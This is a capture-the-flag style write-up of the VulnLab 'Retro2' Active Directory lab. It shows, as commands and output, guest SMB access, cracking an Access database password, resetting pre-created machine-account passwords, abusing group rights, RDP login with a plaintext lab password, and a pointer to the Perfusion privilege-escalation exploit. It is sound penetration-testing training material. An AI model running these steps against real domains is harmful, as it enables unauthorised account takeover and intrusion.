VulnLab Retro2
VulnLab Retro2
Retro2
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
└─$ rustscan -a 10.10.100.238 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.100.238:53
Open 10.10.100.238:88
Open 10.10.100.238:135
Open 10.10.100.238:139
Open 10.10.100.238:389
Open 10.10.100.238:445
Open 10.10.100.238:464
Open 10.10.100.238:593
Open 10.10.100.238:636
Open 10.10.100.238:3269
Open 10.10.100.238:3268
Open 10.10.100.238:3389
Open 10.10.100.238:5722
Open 10.10.100.238:9389
Open 10.10.100.238:49154
Open 10.10.100.238:49157
Open 10.10.100.238:49155
Open 10.10.100.238:49158
Open 10.10.100.238:49173
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 20:23 +05
Initiating Ping Scan at 20:23
Scanning 10.10.100.238 [4 ports]
Completed Ping Scan at 20:23, 2.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:23
Completed Parallel DNS resolution of 1 host. at 20:23, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:23
Scanning 10.10.100.238 [19 ports]
Discovered open port 49158/tcp on 10.10.100.238
Discovered open port 3268/tcp on 10.10.100.238
Completed SYN Stealth Scan at 20:24, 19.06s elapsed (19 total ports)
Nmap scan report for 10.10.100.238
Host is up, received timestamp-reply ttl 127 (0.091s latency).
Scanned at 2024-12-13 20:23:59 +05 for 19s
PORT STATE SERVICE REASON
53/tcp filtered domain no-response
88/tcp filtered kerberos-sec no-response
135/tcp filtered msrpc no-response
139/tcp filtered netbios-ssn no-response
389/tcp filtered ldap no-response
445/tcp filtered microsoft-ds no-response
464/tcp filtered kpasswd5 no-response
593/tcp filtered http-rpc-epmap no-response
636/tcp filtered ldapssl no-response
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp filtered globalcatLDAPssl no-response
3389/tcp filtered ms-wbt-server no-response
5722/tcp filtered msdfsr no-response
9389/tcp filtered adws no-response
49154/tcp filtered unknown no-response
49155/tcp filtered unknown no-response
49157/tcp filtered unknown no-response
49158/tcp open unknown syn-ack ttl 127
49173/tcp filtered unknown no-response
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.38 seconds
Raw packets sent: 86 (3.736KB) | Rcvd: 3 (128B)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,636,3269,3268,3389,5722,9389 10.10.100.238
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 20:27 +05
Nmap scan report for 10.10.100.238
Host is up (0.099s latency).
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open tcpwrapped
636/tcp open tcpwrapped
3268/tcp open tcpwrapped
3269/tcp open tcpwrapped
3389/tcp open tcpwrapped
|_ssl-date: 2024-12-13T15:26:50+00:00; -1m17s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO2
| NetBIOS_Domain_Name: RETRO2
| NetBIOS_Computer_Name: BLN01
| DNS_Domain_Name: retro2.vl
| DNS_Computer_Name: BLN01.retro2.vl
| Product_Version: 6.1.7601
|_ System_Time: 2024-12-13T15:26:10+00:00
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after: 2025-02-15T11:25:28
5722/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-13T15:26:18
|_ start_date: 2024-12-13T15:19:20
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: -13m16s, deviation: 26m47s, median: -1m18s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: BLN01
| NetBIOS computer name: BLN01\x00
| Domain name: retro2.vl
| Forest name: retro2.vl
| FQDN: BLN01.retro2.vl
|_ System time: 2024-12-13T16:26:15+01:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.64 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ ldapsearch -x -H ldap://10.10.100.238 -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=retro2,DC=vl
namingContexts: CN=Configuration,DC=retro2,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro2,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro2,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro2,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
No success with anonymous LDAP
binding
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ ldapsearch -x -H ldap://10.10.100.238 -x -b 'DC=retro2,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro2,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1
# numResponses: 1
User
Let’s check anonymous SMB
authenticatiom
1
2
3
4
5
└─$ nxc smb 10.10.100.238 -u '' -p '' --shares
SMB 10.10.100.238 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.10.100.238 445 BLN01 [+] retro2.vl\:
SMB 10.10.100.238 445 BLN01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
No success, so let’s try with Guest
account (It’s also possible to do it with any username)
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.100.238 -u 'guest' -p '' --shares
SMB 10.10.100.238 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.10.100.238 445 BLN01 [+] retro2.vl\guest:
SMB 10.10.100.238 445 BLN01 [*] Enumerated shares
SMB 10.10.100.238 445 BLN01 Share Permissions Remark
SMB 10.10.100.238 445 BLN01 ----- ----------- ------
SMB 10.10.100.238 445 BLN01 ADMIN$ Remote Admin
SMB 10.10.100.238 445 BLN01 C$ Default share
SMB 10.10.100.238 445 BLN01 IPC$ Remote IPC
SMB 10.10.100.238 445 BLN01 NETLOGON Logon server share
SMB 10.10.100.238 445 BLN01 Public READ
SMB 10.10.100.238 445 BLN01 SYSVOL Logon server share
Let’s check Public
share
1
2
3
4
5
6
7
8
9
10
└─$ impacket-smbclient -no-pass guest@10.10.100.238
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Public
# ls
drw-rw-rw- 0 Sat Aug 17 19:30:37 2024 .
drw-rw-rw- 0 Sat Aug 17 19:30:37 2024 ..
drw-rw-rw- 0 Sat Aug 17 19:30:37 2024 DB
drw-rw-rw- 0 Sat Aug 17 16:58:07 2024 Temp
We found staff.accdb
file inside DB
directory, which is Microsoft Access Database
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ impacket-smbclient -no-pass guest@10.10.100.238
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# cd DB
[-] No share selected
# use Public
# cd DB
# ls
drw-rw-rw- 0 Sat Aug 17 19:30:37 2024 .
drw-rw-rw- 0 Sat Aug 17 19:30:37 2024 ..
-rw-rw-rw- 876544 Sat Aug 17 19:30:34 2024 staff.accdb
# get staff.accdb
1
2
└─$ file staff.accdb
staff.accdb: Microsoft Access Database
We can’t open it, since it prompts for a password. Let’s crack it
1
└─$ office2john staff.accdb > staff.hash
1
2
3
4
5
6
└─$ hashcat --username -m 9600 staff.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:<REDACTED>
<SNIP>
Now we can open the file
Now we have creds, let’s start enumeration with it. Nothing new in shares. We can try gathering domain information with bloodhound
. Add retro2.vl
and bln01.retro2.vl
to /etc/hosts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ bloodhound-python -d retro2.vl -u 'ldapreader' -p '<REDACTED>' -dc bln01.retro2.vl -ns 10.10.100.238 --dns-timeout 10 --zip -c All
INFO: Found AD domain: retro2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: bln01.retro2.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: bln01.retro2.vl
INFO: Found 27 users
INFO: Found 43 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: BLN01.retro2.vl
INFO: Done in 00M 20S
INFO: Compressing output into 20241213210217_bloodhound.zip
We find interesting path from FS01
and FS02
to BLN01
We find nothing else. Let’s try gaining access to FS01
. We can start with Pre-created Computers.
1
2
3
└─$ nxc smb retro2.vl -u 'fs01$' -p 'fs01'
SMB 10.10.100.238 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB 10.10.100.238 445 BLN01 [-] retro2.vl\fs01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
Seems like it works. Let’s change the password using impacket-changepasswd
1
2
3
4
5
6
└─$ impacket-changepasswd 'retro2.vl/fs01$':fs01@retro2.vl -newpass 'P@ssw0rd!' -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro2.vl\fs01$
[*] Connecting to DCE/RPC as retro2.vl\fs01$
[*] Password was changed successfully.
So we need to abuse GenericWrite
over ADMWS01
and add it to services
group. To Abuse GenericWrite
we can:
- Resource-based Constrained Delegation
- Shadow Credentials (We don’t have ADCS)
- Targeted Kerberoasting (in case password is crackable) But in our case, the box is
Windows Server 2008
, thus those techniques don’t work. Someone hinted me about unicodePwd, so let’s try:1
└─$ net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%'P@ssw0rd!' -S BLN01.retro2.vl
1 2 3
└─$ nxc smb retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' SMB 10.10.100.238 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.100.238 445 BLN01 [+] retro2.vl\ADMWS01$:Passw0rd1
Now, we can add user to group due to AddSelf
property. Check this page. We can do it using BloodyAD or with net
:
net rpc group addmem 'Services' 'ldapreader' -U 'retro2.vl/ADMWS01$'%'Passw0rd1' -S BLN01.retro2.vl
We will useBloodyAD
:1 2
└─$ bloodyAD --host bln01.retro2.vl -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader' [+] ldapreader added to SERVICES
``` └─$ net rpc group members ‘Services’ -U ‘retro2.vl/ADMWS01$’%’Passw0rd1’ -S BLN01.retro2.vl RETRO2\inventory RETRO2\ldapreader
1
2
Now we can `RDP`
└─$ xfreerdp /u:’ldapreader’ /p:’ppYaVcB5R’ /v:BLN01.retro2.vl /d:retro2.vl /dynamic-resolution
```
Root
As it was mentioned in the wiki, there are blog posts that we should read:
- https://itm4n.github.io/windows-registry-rpceptmapper-eop/
- https://itm4n.github.io/windows-registry-rpceptmapper-exploit/
We need to build Perfusion. Then upload it and run it
https://api.vulnlab.com/api/v1/share?id=9ab35bbf-1daf-40b1-a08f-7a5ffbe9235c